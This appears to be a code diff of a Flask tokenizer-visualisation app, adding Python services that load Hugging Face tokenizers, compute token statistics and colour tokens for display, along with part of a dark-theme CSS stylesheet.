+ 'tokenizer_info': tokenizer_info
122
+ }
123
+
124
+ @staticmethod
125
+ def process_text_for_tokenization(
126
+ text: str,
127
+ model_id_or_name: str,
128
+ is_preview: bool = False,
129
+ preview_char_limit: int = 8096,
130
+ max_display_tokens: int = 50000
131
+ ) -> Dict[str, Any]:
132
+ """
133
+ Process regular text input for tokenization.
134
+
135
+ Args:
136
+ text: Input text to tokenize
137
+ model_id_or_name: Tokenizer model to use
138
+ is_preview: Whether this is a preview of a larger text
139
+ preview_char_limit: Character limit for preview
140
+ max_display_tokens: Maximum tokens to display
141
+
142
+ Returns:
143
+ Dict containing tokenization results
144
+ """
145
+ # Load tokenizer
146
+ tokenizer, tokenizer_info, error = tokenizer_service.load_tokenizer(model_id_or_name)
147
+
148
+ if error:
149
+ raise Exception(error)
150
+
151
+ # Tokenize full text for stats
152
+ all_tokens = tokenizer.tokenize(text)
153
+ total_token_count = len(all_tokens)
154
+
155
+ # For display: if it's a preview, only take first preview_char_limit chars
156
+ preview_text = text[:preview_char_limit] if is_preview else text
157
+ preview_tokens = tokenizer.tokenize(preview_text)
158
+ display_tokens = preview_tokens[:max_display_tokens]
159
+
160
+ # Calculate stats on full text
161
+ stats = stats_service.get_token_stats(all_tokens, text)
162
+
163
+ # Format tokens for display
164
+ token_data = stats_service.format_tokens_for_display(display_tokens, tokenizer)
165
+
166
+ return {
167
+ 'tokens': token_data,
168
+ 'stats': stats,
169
+ 'display_limit_reached': total_token_count > max_display_tokens and not is_preview,
170
+ 'total_tokens': total_token_count,
171
+ 'is_full_file': False,
172
+ 'preview_only': is_preview,
173
+ 'tokenizer_info': tokenizer_info
174
+ }
175
+
176
+ @staticmethod
177
+ def cleanup_file(file_path: str):
178
+ """Safely remove a file if it exists."""
179
+ try:
180
+ if os.path.exists(file_path):
181
+ os.remove(file_path)
182
+ except OSError:
183
+ pass # Ignore errors during cleanup
184
+
185
+
186
+ # Global instance
187
+ file_service = FileService()
app/services/stats_service.py ADDED
@@ -0,0 +1,98 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Stats Service - Handles token statistics and color generation
3
+ """
4
+ import hashlib
5
+ import math
6
+ from typing import List, Dict, Any
7
+
8
+
9
+ class StatsService:
10
+ """Service for calculating token statistics and generating colors."""
11
+
12
+ @staticmethod
13
+ def get_varied_color(token: str) -> Dict[str, str]:
14
+ """Generate vibrant colors with HSL for better visual distinction."""
15
+ token_hash = hashlib.md5(token.encode()).hexdigest()
16
+ hue = int(token_hash[:3], 16) % 360
17
+ saturation = 70 + (int(token_hash[3:5], 16) % 20)
18
+ lightness = 80 + (int(token_hash[5:7], 16) % 10)
19
+ text_lightness = 20 if lightness > 50 else 90
20
+
21
+ return {
22
+ 'background': f'hsl({hue}, {saturation}%, {lightness}%)',
23
+ 'text': f'hsl({hue}, {saturation}%, {text_lightness}%)'
24
+ }
25
+
26
+ @staticmethod
27
+ def fix_token(token: str) -> str:
28
+ """Fix token for display with improved space visualization."""
29
+ if token.startswith('Ġ'):
30
+ space_count = token.count('Ġ')
31
+ return '·' * space_count + token[space_count:]
32
+ return token
33
+
34
+ @staticmethod
35
+ def get_token_stats(tokens: List[str], original_text: str) -> Dict[str, Any]:
36
+ """Calculate enhanced statistics about the tokens."""
37
+ if not tokens:
38
+ return {}
39
+
40
+ total_tokens = len(tokens)
41
+ unique_tokens = len(set(tokens))
42
+ avg_length = sum(len(t) for t in tokens) / total_tokens
43
+ compression_ratio = len(original_text) / total_tokens
44
+
45
+ # Token type analysis
46
+ space_tokens = sum(1 for t in tokens if t.startswith('Ġ'))
47
+ newline_tokens = sum(1 for t in tokens if 'Ċ' in t)
48
+ special_tokens = sum(1 for t in tokens if any(c in t for c in ['<', '>', '[', ']', '{', '}']))
49
+ punctuation_tokens = sum(1 for t in tokens if any(c in t for c in '.,!?;:()'))
50
+
51
+ # Length distribution
52
+ lengths = [len(t) for t in tokens]
53
+ mean_length = sum(lengths) / len(lengths)
54
+ variance = sum((x - mean_length) ** 2 for x in lengths) / len(lengths)
55
+ std_dev = math.sqrt(variance)
56
+
57
+ return {
58
+ 'basic_stats': {
59
+ 'total_tokens': total_tokens,
60
+ 'unique_tokens': unique_tokens,
61
+ 'compression_ratio': round(compression_ratio, 2),
62
+ 'space_tokens': space_tokens,
63
+ 'newline_tokens': newline_tokens,
64
+ 'special_tokens': special_tokens,
65
+ 'punctuation_tokens': punctuation_tokens,
66
+ 'unique_percentage': round(unique_tokens/total_tokens * 100, 1)
67
+ },
68
+ 'length_stats': {
69
+ 'avg_length': round(avg_length, 2),
70
+ 'std_dev': round(std_dev, 2),
71
+ 'min_length': min(lengths),
72
+ 'max_length': max(lengths),
73
+ 'median_length': sorted(lengths)[len(lengths)//2]
74
+ }
75
+ }
76
+
77
+ @staticmethod
78
+ def format_tokens_for_display(tokens: List[str], tokenizer) -> List[Dict[str, Any]]:
79
+ """Format tokens for frontend display with colors and metadata."""
80
+ token_data = []
81
+ for idx, token in enumerate(tokens):
82
+ colors = StatsService.get_varied_color(token)
83
+ fixed_token = StatsService.fix_token(token)
84
+ # Compute the numerical token ID from the tokenizer
85
+ token_id = tokenizer.convert_tokens_to_ids(token)
86
+ token_data.append({
87
+ 'original': token,
88
+ 'display': fixed_token[:-1] if fixed_token.endswith('Ċ') else fixed_token,
89
+ 'colors': colors,
90
+ 'newline': fixed_token.endswith('Ċ'),
91
+ 'token_id': token_id,
92
+ 'token_index': idx
93
+ })
94
+ return token_data
95
+
96
+
97
+ # Global instance
98
+ stats_service = StatsService()
app/services/tokenizer_service.py ADDED
@@ -0,0 +1,182 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Tokenizer Service - Handles tokenizer loading, caching, and management
3
+ """
4
+ import time
5
+ from typing import Dict, Tuple, Optional, Any
6
+ from transformers import AutoTokenizer
7
+ from flask import current_app
8
+
9
+
10
+ class TokenizerService:
11
+ """Service for managing tokenizer loading and caching."""
12
+
13
+ # Predefined tokenizer models with aliases
14
+ TOKENIZER_MODELS = {
15
+ 'qwen3': {
16
+ 'name': 'Qwen/Qwen3-0.6B',
17
+ 'alias': 'Qwen 3'
18
+ },
19
+ 'gemma3-27b': {
20
+ 'name': 'google/gemma-3-27b-it',
21
+ 'alias': 'Gemma 3 27B'
22
+ },
23
+ 'glm4': {
24
+ 'name': 'THUDM/GLM-4-32B-0414',
25
+ 'alias': 'GLM 4'
26
+ },
27
+ 'mistral-small': {
28
+ 'name': 'mistralai/Mistral-Small-3.1-24B-Instruct-2503',
29
+ 'alias': 'Mistral Small 3.1'
30
+ },
31
+ 'llama4': {
32
+ 'name': 'meta-llama/Llama-4-Scout-17B-16E-Instruct',
33
+ 'alias': 'Llama 4'
34
+ },
35
+ 'deepseek-r1': {
36
+ 'name': 'deepseek-ai/DeepSeek-R1',
37
+ 'alias': 'Deepseek R1'
38
+ },
39
+ 'qwen_25_72b': {
40
+ 'name': 'Qwen/Qwen2.5-72B-Instruct',
41
+ 'alias': 'QWQ 32B'
42
+ },
43
+ 'llama_33': {
44
+ 'name': 'unsloth/Llama-3.3-70B-Instruct-bnb-4bit',
45
+ 'alias': 'Llama 3.3 70B'
46
+ },
47
+ 'gemma2_2b': {
48
+ 'name': 'google/gemma-2-2b-it',
49
+ 'alias': 'Gemma 2 2B'
50
+ },
51
+ 'bert-large-uncased': {
52
+ 'name': 'google-bert/bert-large-uncased',
53
+ 'alias': 'Bert Large Uncased'
54
+ },
55
+ 'gpt2': {
56
+ 'name': 'openai-community/gpt2',
57
+ 'alias': 'GPT-2'
58
+ }
59
+ }
60
+
61
+ def __init__(self):
62
+ """Initialize the tokenizer service with empty caches."""
63
+ self.tokenizers: Dict[str, Any] = {}
64
+ self.custom_tokenizers: Dict[str, Tuple[Any, float]] = {}
65
+ self.tokenizer_info_cache: Dict[str, Dict] = {}
66
+ self.custom_model_errors: Dict[str, str] = {}
67
+
68
+ def get_tokenizer_info(self, tokenizer) -> Dict:
69
+ """Extract useful information from a tokenizer."""
70
+ info = {}
71
+ try:
72
+ # Get vocabulary size (dictionary size)
73
+ if hasattr(tokenizer, 'vocab_size'):
74
+ info['vocab_size'] = tokenizer.vocab_size
75
+ elif hasattr(tokenizer, 'get_vocab'):
76
+ info['vocab_size'] = len(tokenizer.get_vocab())
77
+
78
+ # Get model max length if available
79
+ if hasattr(tokenizer, 'model_max_length') and tokenizer.model_max_length < 1000000:
80
+ info['model_max_length'] = tokenizer.model_max_length
81
+
82
+ # Check tokenizer type
83
+ info['tokenizer_type'] = tokenizer.__class__.__name__
84
+
85
+ # Get special tokens
86
+ special_tokens = {}
87
+ for token_name in ['pad_token', 'eos_token', 'bos_token', 'sep_token', 'cls_token', 'unk_token', 'mask_token']:
88
+ if hasattr(tokenizer, token_name) and getattr(tokenizer, token_name) is not None:
89
+ token_value = getattr(tokenizer, token_name)
90
+ if token_value and str(token_value).strip():
91
+ special_tokens[token_name] = str(token_value)
92
+
93
+ info['special_tokens'] = special_tokens
94
+
95
+ except Exception as e:
96
+ info['error'] = f"Error extracting tokenizer info: {str(e)}"
97
+
98
+ return info
99
+
100
+ def load_tokenizer(self, model_id_or_name: str) -> Tuple[Optional[Any], Dict, Optional[str]]:
101
+ """
102
+ Load tokenizer if not already loaded.
103
+
104
+ Returns:
105
+ Tuple of (tokenizer, tokenizer_info, error_message)
106
+ """
107
+ error_message = None
108
+ tokenizer_info = {}
109
+
110
+ # Check if we have cached tokenizer info
111
+ if model_id_or_name in self.tokenizer_info_cache:
112
+ tokenizer_info = self.tokenizer_info_cache[model_id_or_name]
113
+
114
+ try:
115
+ # Check if it's a predefined model ID
116
+ if model_id_or_name in self.TOKENIZER_MODELS:
117
+ model_name = self.TOKENIZER_MODELS[model_id_or_name]['name']
118
+ if model_id_or_name not in self.tokenizers:
119
+ self.tokenizers[model_id_or_name] = AutoTokenizer.from_pretrained(model_name)
120
+ tokenizer = self.tokenizers[model_id_or_name]
121
+
122
+ # Get tokenizer info if not already cached
123
+ if model_id_or_name not in self.tokenizer_info_cache:
124
+ tokenizer_info = self.get_tokenizer_info(tokenizer)
125
+ self.tokenizer_info_cache[model_id_or_name] = tokenizer_info
126
+
127
+ return tokenizer, tokenizer_info, None
128
+
129
+ # It's a custom model path
130
+ # Check if we have it in the custom cache and it's not expired
131
+ current_time = time.time()
132
+ cache_expiration = current_app.config.get('CACHE_EXPIRATION', 3600)
133
+
134
+ if model_id_or_name in self.custom_tokenizers:
135
+ cached_tokenizer, timestamp = self.custom_tokenizers[model_id_or_name]
136
+ if current_time - timestamp < cache_expiration:
137
+ # Get tokenizer info if not already cached
138
+ if model_id_or_name not in self.tokenizer_info_cache:
139
+ tokenizer_info = self.get_tokenizer_info(cached_tokenizer)
140
+ self.tokenizer_info_cache[model_id_or_name] = tokenizer_info
141
+ return cached_tokenizer, tokenizer_info, None
142
+
143
+ # Not in cache or expired, load it
144
+ tokenizer = AutoTokenizer.from_pretrained(model_id_or_name)
145
+ # Store in cache with timestamp
146
+ self.custom_tokenizers[model_id_or_name] = (tokenizer, current_time)
147
+ # Clear any previous errors for this model
148
+ if model_id_or_name in self.custom_model_errors:
149
+ del self.custom_model_errors[model_id_or_name]
150
+
151
+ # Get tokenizer info
152
+ tokenizer_info = self.get_tokenizer_info(tokenizer)
153
+ self.tokenizer_info_cache[model_id_or_name] = tokenizer_info
154
+
155
+ return tokenizer, tokenizer_info, None
156
+
157
+ except Exception as e:
158
+ error_message = f"Failed to load tokenizer: {str(e)}"
159
+ # Store error for future reference
160
+ self.custom_model_errors[model_id_or_name] = error_message
161
+ return None, tokenizer_info, error_message
162
+
163
+ def get_model_alias(self, model_id: str) -> str:
164
+ """Get the display alias for a model ID."""
165
+ if model_id in self.TOKENIZER_MODELS:
166
+ return self.TOKENIZER_MODELS[model_id]['alias']
167
+ return model_id
168
+
169
+ def is_predefined_model(self, model_id: str) -> bool:
170
+ """Check if a model ID is a predefined model."""
171
+ return model_id in self.TOKENIZER_MODELS
172
+
173
+ def clear_cache(self):
174
+ """Clear all caches."""
175
+ self.tokenizers.clear()
176
+ self.custom_tokenizers.clear()
177
+ self.tokenizer_info_cache.clear()
178
+ self.custom_model_errors.clear()
179
+
180
+
181
+ # Global instance
182
+ tokenizer_service = TokenizerService()
app/static/css/style.css ADDED
@@ -0,0 +1,1298 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ :root {
2
+ --primary-color: #0f4f9b; /* Blue accent */
3
+ --primary-hover: #0c3e7a; /* Darker blue accent */
4
+ --bg-color: #121212; /* Dark background */
5
+ --card-bg: #1e1e1e; /* Dark card background */
6
+ --card-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.7),
7
+ 0 2px 4px -1px rgba(0, 0, 0, 0.6);
8
+ --transition: all 0.3s ease;
9
+ --text-color: #E0E0E0; /* Main text color */
10
+ --secondary-text: #A0A0A0;/* Secondary text color */
11
+ --input-bg: #2a2a2a; /* Input/textarea background */
12
+ --input-border: #444444; /* Input/textarea border */
13
+ --input-focus: #0f4f9b; /* Focus border color */
14
+ }
15
+
16
+ * {
17
+ margin: 0;
18
+ padding: 0;
19
+ box-sizing: border-box;
20
+ font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
21
+ scrollbar-width: thin;
22
+ scrollbar-color: #0f4f9b #121212
23
+ }
24
+
25
+ /* Width and height of the scrollbar */
26
+ ::-webkit-scrollbar {
27
+ width: 12px;
28
+ height: 12px;
29
+ }
30
+
31
+ @keyframes spin {
32
+ from { transform: rotate(0deg); }
33
+ to { transform: rotate(360deg); }
34
+ }
35
+
36
+ /* Loading spinner styles */
37
+ .loading-spinner {
38
+ display: inline-block;
39
+ width: 20px;
40
+ height: 20px;
41
+ border: 2px solid rgba(255, 255, 255, 0.3);
42
+ border-radius: 50%;
43
+ border-top-color: #fff;
44
+ animation: spin 1s linear infinite;
45
+ margin-left: 8px;
46
+ vertical-align: middle;
47
+ }
48
+
49
+ .loading-spinner.large {
50
+ width: 40px;
51
+ height: 40px;
52
+ border-width: 3px;
53
+ }
54
+
55
+ .loading-overlay {
56
+ position: fixed;
57
+ top: 0;
58
+ left: 0;
59
+ width: 100%;
60
+ height: 100%;
61
+ background-color: rgba(18, 18, 18, 0.8);
62
+ display: flex;
63
+ justify-content: center;
64
+ align-items: center;
65
+ z-index: 9999;
66
+ opacity: 0;
67
+ visibility: hidden;
68
+ transition: opacity 0.3s ease, visibility 0.3s ease;
69
+ }
70
+
71
+ .loading-overlay.active {
72
+ opacity: 1;
73
+ visibility: visible;
74
+ }
75
+
76
+ .loading-content {
77
+ background-color: var(--card-bg);
78
+ padding: 2rem;
79
+ border-radius: 1rem;
80
+ box-shadow: var(--card-shadow);
81
+ text-align: center;
82
+ min-width: 200px;
83
+ }
84
+
85
+ .loading-text {
86
+ color: var(--text-color);
87
+ font-size: 1.1rem;
88
+ margin-top: 1rem;
89
+ }
90
+
91
+ /* Keyboard shortcut indicator */
92
+ .keyboard-shortcut-hint {
93
+ position: absolute;
94
+ top: 10px;
95
+ right: 10px;
96
+ background: rgba(15, 79, 155, 0.1);
97
+ color: var(--primary-color);
98
+ font-size: 0.8rem;
99
+ padding: 0.25rem 0.5rem;
100
+ border-radius: 0.375rem;
101
+ border: 1px solid rgba(15, 79, 155, 0.2);
102
+ pointer-events: none;
103
+ opacity: 0.7;
104
+ font-family: monospace;
105
+ }
106
+
107
+ .input-section {
108
+ position: relative;
109
+ }
110
+
111
+ /* Card header styles */
112
+ .card-header {
113
+ display: flex;
114
+ align-items: center;
115
+ justify-content: space-between;
116
+ margin-bottom: 1.25rem;
117
+ }
118
+
119
+ .card-header .card-title {
120
+ margin-bottom: 0;
121
+ }
122
+
123
+ /* Token search styles */
124
+ .search-toggle-btn {
125
+ background: var(--primary-color);
126
+ color: white;
127
+ border: none;
128
+ border-radius: 50%;
129
+ width: 36px;
130
+ height: 36px;
131
+ min-width: 36px;
132
+ min-height: 36px;
133
+ display: flex;
134
+ align-items: center;
135
+ justify-content: center;
136
+ cursor: pointer;
137
+ transition: var(--transition);
138
+ box-shadow: 0 2px 4px rgba(15, 79, 155, 0.3);
139
+ padding: 0;
140
+ flex-shrink: 0;
141
+ }
142
+
143
+ .search-toggle-btn:hover {
144
+ background-color: var(--primary-hover);
145
+ transform: translateY(-1px);
146
+ box-shadow: 0 4px 8px rgba(15, 79, 155, 0.4);
147
+ }
148
+
149
+ .search-toggle-btn.active {
150
+ background-color: var(--primary-hover);
151
+ box-shadow: 0 2px 8px rgba(15, 79, 155, 0.5);
152
+ }
153
+
154
+ .search-toggle-btn svg {
155
+ width: 18px;
156
+ height: 18px;
157
+ fill: currentColor;
158
+ flex-shrink: 0;
159
+ }
160
+
161
+ .token-search-container {
162
+ display: none;
163
+ flex-direction: column;
164
+ gap: 1rem;
165
+ margin-bottom: 1.5rem;
166
+ padding: 1.25rem;
167
+ background-color: rgba(15, 79, 155, 0.1);
168
+ border-radius: 0.75rem;
169
+ border: 1px solid rgba(15, 79, 155, 0.2);
170
+ opacity: 0;
171
+ transform: translateY(-10px);
172
+ transition: opacity 0.3s ease, transform 0.3s ease;
173
+ width: 100%;
174
+ }
175
+
176
+ .token-search-container.show {
177
+ display: flex;
178
+ opacity: 1;
179
+ transform: translateY(0);
180
+ }
181
+
182
+ .token-search-row {
183
+ display: flex;
184
+ align-items: center;
185
+ gap: 1rem;
186
+ width: 100%;
187
+ }
188
+
189
+ @keyframes slideDown {
190
+ from {
191
+ opacity: 0;
192
+ transform: translateY(-10px);
193
+ }
194
+ to {
195
+ opacity: 1;
196
+ transform: translateY(0);
197
+ }
198
+ }
199
+
200
+ .token-search-input {
201
+ flex: 1;
202
+ padding: 0.875rem 1rem;
203
+ border: 2px solid var(--input-border);
204
+ border-radius: 0.5rem;
205
+ background-color: var(--input-bg);
206
+ color: var(--text-color);
207
+ font-size: 1rem;
208
+ transition: var(--transition);
209
+ min-width: 0;
210
+ }
211
+
212
+ .token-search-input:focus {
213
+ outline: none;
214
+ border-color: var(--primary-color);
215
+ box-shadow: 0 0 0 3px rgba(15, 79, 155, 0.1);
216
+ }
217
+
218
+ .token-search-controls {
219
+ display: flex;
220
+ align-items: center;
221
+ gap: 0.75rem;
222
+ flex-shrink: 0;
223
+ }
224
+
225
+ .token-search-btn {
226
+ padding: 0.5rem 1rem;
227
+ background: var(--primary-color);
228
+ color: white;
229
+ border: none;
230
+ border-radius: 0.5rem;
231
+ font-size: 0.875rem;
232
+ font-weight: 500;
233
+ cursor: pointer;
234
+ transition: var(--transition);
235
+ box-shadow: 0 1px 3px rgba(15, 79, 155, 0.3);
236
+ min-width: 44px;
237
+ }
238
+
239
+ .token-search-btn:hover {
240
+ background: var(--primary-hover);
241
+ transform: translateY(-1px);
242
+ box-shadow: 0 2px 6px rgba(15, 79, 155, 0.4);
243
+ }
244
+
245
+ .token-search-btn:disabled {
246
+ opacity: 0.5;
247
+ cursor: not-allowed;
248
+ transform: none;
249
+ }
250
+
251
+ .token-search-count {
252
+ color: var(--text-color);
253
+ font-size: 0.875rem;
254
+ font-weight: 500;
255
+ white-space: nowrap;
256
+ background-color: rgba(255, 255, 255, 0.1);
257
+ padding: 0.5rem 0.75rem;
258
+ border-radius: 0.375rem;
259
+ min-width: 60px;
260
+ text-align: center;
261
+ }
262
+
263
+ /* Highlighted token styles */
264
+ .token.highlighted {
265
+ background-color: #fbbf24 !important;
266
+ color: #1f2937 !important;
267
+ box-shadow: 0 0 0 2px #f59e0b;
268
+ z-index: 1;
269
+ position: relative;
270
+ }
271
+
272
+ .token.highlighted.current {
273
+ background-color: #f59e0b !important;
274
+ color: white !important;
275
+ box-shadow: 0 0 0 3px #f59e0b;
276
+ }
277
+
278
+ /* Token frequency chart styles */
279
+ .frequency-chart-container {
280
+ margin-top: 1.5rem;
281
+ padding: 1rem;
282
+ background-color: rgba(15, 79, 155, 0.05);
283
+ border-radius: 0.5rem;
284
+ border: 1px solid rgba(15, 79, 155, 0.1);
285
+ }
286
+
287
+ .frequency-chart-title {
288
+ font-size: 1rem;
289
+ font-weight: 600;
290
+ color: var(--text-color);
291
+ margin-bottom: 1rem;
292
+ display: flex;
293
+ align-items: center;
294
+ gap: 0.5rem;
295
+ }
296
+
297
+ .frequency-chart {
298
+ display: flex;
299
+ flex-direction: column;
300
+ gap: 0.5rem;
301
+ }
302
+
303
+ .frequency-item {
304
+ display: flex;
305
+ align-items: center;
306
+ gap: 0.75rem;
307
+ padding: 0.5rem;
308
+ background-color: var(--input-bg);
309
+ border-radius: 0.375rem;
310
+ transition: var(--transition);
311
+ }
312
+
313
+ .frequency-item:hover {
314
+ background-color: rgba(255, 255, 255, 0.05);
315
+ }
316
+
317
+ .frequency-token {
318
+ font-family: 'SF Mono', 'Monaco', 'Inconsolata', 'Fira Mono', 'Droid Sans Mono', 'Source Code Pro', monospace;
319
+ font-size: 0.8rem;
320
+ background-color: rgba(15, 79, 155, 0.2);
321
+ color: var(--primary-color);
322
+ padding: 0.25rem 0.5rem;
323
+ border-radius: 0.25rem;
324
+ min-width: 60px;
325
+ text-align: center;
326
+ cursor: pointer;
327
+ transition: var(--transition);
328
+ }
329
+
330
+ .frequency-token:hover {
331
+ background-color: var(--primary-color);
332
+ color: white;
333
+ }
334
+
335
+ .frequency-bar-container {
336
+ flex: 1;
337
+ display: flex;
338
+ align-items: center;
339
+ gap: 0.5rem;
340
+ }
341
+
342
+ .frequency-bar {
343
+ flex: 1;
344
+ height: 20px;
345
+ background-color: rgba(255, 255, 255, 0.1);
346
+ border-radius: 10px;
347
+ overflow: hidden;
348
+ position: relative;
349
+ }
350
+
351
+ .frequency-bar-fill {
352
+ height: 100%;
353
+ background: linear-gradient(90deg, var(--primary-color) 0%, var(--primary-hover) 100%);
354
+ border-radius: 10px;
355
+ transition: width 0.5s ease;
356
+ position: relative;
357
+ }
358
+
359
+ .frequency-count {
360
+ color: var(--secondary-text);
361
+ font-size: 0.8rem;
362
+ font-weight: 500;
363
+ min-width: 40px;
364
+ text-align: right;
365
+ }
366
+
367
+ .chart-toggle-btn {
368
+ background: none;
369
+ border: 1px solid var(--primary-color);
370
+ color: var(--primary-color);
371
+ padding: 0.375rem 0.75rem;
372
+ border-radius: 0.375rem;
373
+ font-size: 0.8rem;
374
+ cursor: pointer;
375
+ transition: var(--transition);
376
+ box-shadow: none;
377
+ }
378
+
379
+ .chart-toggle-btn:hover {
380
+ background-color: var(--primary-color);
381
+ color: white;
382
+ transform: none;
383
+ box-shadow: none;
384
+ }
385
+
386
+ .chart-toggle-btn.active {
387
+ background-color: var(--primary-color);
388
+ color: white;
389
+ }
390
+
391
+ /* Track (background) */
392
+ ::-webkit-scrollbar-track {
393
+ background: #121212;
394
+ border-radius: 10px;
395
+ }
396
+
397
+ /* Handle (draggable part) */
398
+ ::-webkit-scrollbar-thumb {
399
+ background: #0f4f9b;
400
+ border-radius: 10px;
401
+ border: 2px solid #121212;
402
+ }
403
+
404
+ /* Handle on hover */
405
+ ::-webkit-scrollbar-thumb:hover {
406
+ background: #0c3e7a;
407
+ }
408
+
409
+
410
+ body {
411
+ background-color: var(--bg-color);
412
+ padding: 2rem;
413
+ min-height: 100vh;
414
+ background-image:
415
+ radial-gradient(circle at 20% 20%, rgba(15, 79, 155, 0.1) 0%, transparent 50%),
416
+ radial-gradient(circle at 80% 80%, rgba(15, 79, 155, 0.1) 0%, transparent 50%);
417
+ color: var(--text-color);
418
+ }
419
+
420
+ .container {
421
+ max-width: 1200px;
422
+ margin: 0 auto;
423
+ }
424
+
425
